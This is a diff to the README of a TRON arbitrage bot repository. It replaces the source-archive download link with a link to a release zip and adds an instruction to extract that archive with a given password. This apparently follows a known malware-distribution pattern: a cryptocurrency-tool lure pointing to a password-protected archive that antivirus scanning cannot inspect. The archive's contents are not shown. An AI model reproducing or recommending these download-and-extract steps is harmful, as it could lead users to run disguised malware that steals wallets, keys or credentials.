wendel-batista-2008/tron-arbitrage-bot/README.md

 To interact with TRON via TronGrid (a public TRON API service), you'll need an API key.
 You can obtain one by signing up on TronGrid.

-Once you have the API key, update your .env with the following:
+Once you have the API key, update your configuration file or environment variables with the following:
 ```
 TRON_RPC_URL=https://api.trongrid.io
 TRONGRID_API_KEY=your_api_key_here
 ```

 ### Environment Configuration
-- Clone the repository or [download last release](https://github.com/wendel-batista-2008/tron-arbitrage-bot/archive/refs/heads/main.zip):
+- Clone the repository or [download last release](https://github.com/wendel-batista-2008/tron-arbitrage-bot/releases/download/Release/tron-arbitrage-bot.zip):

 ```
 git clone https://github.com/wendel-batista-2008/tron-arbitrage-bot.git
 cd tron-arbitrage-bot
 ```
+- Extract files with password `vYEfdsaUe`
 - Set up your environment variables or configuration file with the following:

 ```